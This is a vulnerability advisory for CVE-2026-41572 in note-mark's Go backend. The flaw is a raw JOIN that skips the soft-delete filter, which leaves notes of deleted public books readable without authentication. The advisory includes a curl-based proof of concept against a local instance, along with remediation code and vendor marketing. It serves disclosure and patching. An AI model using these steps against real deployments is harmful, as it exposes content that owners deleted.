CVE-2026-41572

CVE-2026-41572 is a medium-severity security vulnerability in github.com/enchant97/note-mark/backend (go), affecting versions < 0.0.0-20260417132843-d1bf845a2a2d. It is fixed in 0.0.0-20260417132843-d1bf845a2a2d.

Summary

After a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM's soft-delete scope does not reach the raw JOIN books ... clauses used by the note and asset queries.

Details

DELETE /api/books/{bookID} sets books.deleted_at to the current time. The book-level endpoint starts returning 404, which matches the owner's expectation that the book is gone. The note service and asset service query notes with a raw join that does not filter books.deleted_at IS NULL:

// backend/services/notes.go:91-98 (GetNoteByID)
func (s NotesService) GetNoteByID(currentUserID *uuid.UUID, noteID uuid.UUID) (db.Note, error) {
    var note db.Note
    return note, dbErrorToServiceError(db.DB.
        Preload("Book").
        Joins("JOIN books ON books.id = notes.book_id").
        Where("owner_id = ? OR is_public = ?", currentUserID, true).
        First(&note, "notes.id = ?", noteID).Error)
}

GORM applies its soft-delete scope to the primary model of a query (here, notes) and to implicit Joins("Book") association clauses. It does not rewrite raw SQL passed to Joins. The soft-deleted book row keeps is_public = true, so the WHERE owner_id = ? OR is_public = ? clause still evaluates true for any caller on a book that was public at deletion time. For an unauthenticated caller (currentUserID = nil), owner_id = NULL fails but is_public = true passes, so the note query returns the row.

note-mark has a restore flow at PUT /api/notes/{noteID}/restore (backend/services/notes.go:232-262) that un-deletes the note and the parent book in one transaction. Owner access to soft-deleted notes is deliberate for that path; the comment at line 253 spells out the intent. The bug is that is_public = true survives the deletion, so unauthenticated callers keep access the owner chose to revoke.

The same raw-join pattern repeats at 9 more call sites in backend/services/notes.go (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and 4 call sites in backend/services/assets.go (lines 29, 73, 106, 143). Every public endpoint that reads a note or an asset inherits the bug.

Proof of Concept

Tested against note-mark v0.19.2.

Step 1: Start note-mark.

docker run -d --name note-mark-poc -p 8088:8080 \
  ghcr.io/enchant97/note-mark-backend:0.19.2

Step 2: Alice signs up and logs in.

curl -X POST http://localhost:8088/api/users \
  -H 'Content-Type: application/json' \
  -d '{"username":"alice","password":"Alicepass123!","name":"Alice"}'

curl -c alice.cookies -X POST http://localhost:8088/api/auth/token \
  -H 'Content-Type: application/json' \
  -d '{"grant_type":"password","username":"alice","password":"Alicepass123!"}'

Step 3: Alice creates a public book and adds a note with content. Save the IDs from each response.

curl -b alice.cookies -X POST http://localhost:8088/api/books \
  -H 'Content-Type: application/json' \
  -d '{"name":"Alice Public Book","slug":"public-book","isPublic":true}'
# {"id":"<BOOK_ID>", ...}

curl -b alice.cookies -X POST http://localhost:8088/api/books/<BOOK_ID>/notes \
  -H 'Content-Type: application/json' \
  -d '{"name":"Secret Note","slug":"secret-note"}'
# {"id":"<NOTE_ID>", ...}

curl -b alice.cookies -X PUT http://localhost:8088/api/notes/<NOTE_ID>/content \
  -H 'Content-Type: text/plain' \
  --data 'This is Alice secret note content.'

Step 4: Bob (no cookie) reads the note while the book is still live. This is expected for a public book.

curl http://localhost:8088/api/notes/<NOTE_ID>/content
# This is Alice secret note content.

Step 5: Alice soft-deletes the book.

curl -b alice.cookies -X DELETE http://localhost:8088/api/books/<BOOK_ID>
# HTTP/1.1 204 No Content

Step 6: The book endpoint 404s. The note endpoints still serve Alice's content to Bob.

curl -w "\n%{http_code}\n" http://localhost:8088/api/books/<BOOK_ID>
# 404

curl -w "\n%{http_code}\n" http://localhost:8088/api/notes/<NOTE_ID>
# {"id":"<NOTE_ID>","name":"Secret Note", ...}
# 200

curl http://localhost:8088/api/notes/<NOTE_ID>/content
# This is Alice secret note content.

curl http://localhost:8088/api/slug/alice/books/public-book/notes/secret-note
# {"id":"<NOTE_ID>","name":"Secret Note", ...}

A companion script that drives Steps 1-6 ships at pocs/poc_005_bac_soft_deleted_book.sh.

Impact

Any owner who soft-deletes a public book expecting the content to drop off the internet is wrong. Notes, markdown content, and uploaded assets stay readable for every unauthenticated caller who knows the note ID or the slug path. Slugs are human-readable and change hands in documentation, notes, and bug trackers. The leak covers every public note and asset endpoint, not a single handler. Private books are not affected because is_public = false and owner_id = NULL both fail the visibility check for non-owners.

CVE-2026-41572 has a CVSS score of 5.3 (Medium). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.0.0-20260417132843-d1bf845a2a2d); upgrading removes the vulnerable code path.

Affected versions

github.com/enchant97/note-mark/backend (< 0.0.0-20260417132843-d1bf845a2a2d)

Security releases

github.com/enchant97/note-mark/backend → 0.0.0-20260417132843-d1bf845a2a2d (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Add a soft-delete filter to the visibility clause on every raw Joins("JOIN books ..."). Keep the owner's access intact so the restore flow at PUT /api/notes/{id}/restore continues to work:

// backend/services/notes.go:91-98 (GetNoteByID)
return note, dbErrorToServiceError(db.DB.
    Preload("Book").
    Joins("JOIN books ON books.id = notes.book_id").
    Where("(books.deleted_at IS NULL OR books.owner_id = ?)", currentUserID).
    Where("owner_id = ? OR is_public = ?", currentUserID, true).
    First(&note, "notes.id = ?", noteID).Error)

The same transform applies to each of the 13 call sites in backend/services/notes.go (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and backend/services/assets.go (lines 29, 73, 106, 143). backend/cli/clean.go:31 uses the same join pattern but is a maintenance CLI and does not need the fix.

Found by aisafe.io

Frequently Asked Questions

  1. What is CVE-2026-41572? CVE-2026-41572 is a medium-severity security vulnerability in github.com/enchant97/note-mark/backend (go), affecting versions < 0.0.0-20260417132843-d1bf845a2a2d. It is fixed in 0.0.0-20260417132843-d1bf845a2a2d.
  2. How severe is CVE-2026-41572? CVE-2026-41572 has a CVSS score of 5.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/enchant97/note-mark/backend are affected by CVE-2026-41572? github.com/enchant97/note-mark/backend (go) versions < 0.0.0-20260417132843-d1bf845a2a2d is affected.
  4. Is there a fix for CVE-2026-41572? Yes. CVE-2026-41572 is fixed in 0.0.0-20260417132843-d1bf845a2a2d. Upgrade to this version or later.
  5. Is CVE-2026-41572 exploitable, and should I be worried? Whether CVE-2026-41572 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-41572 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-41572? Upgrade github.com/enchant97/note-mark/backend to 0.0.0-20260417132843-d1bf845a2a2d or later.

Other vulnerabilities in github.com/enchant97/note-mark/backend

CVE-2026-44523CVE-2026-44522CVE-2026-41571CVE-2026-40265CVE-2026-40263

Stop the waste.
Protect your environment with Kodem.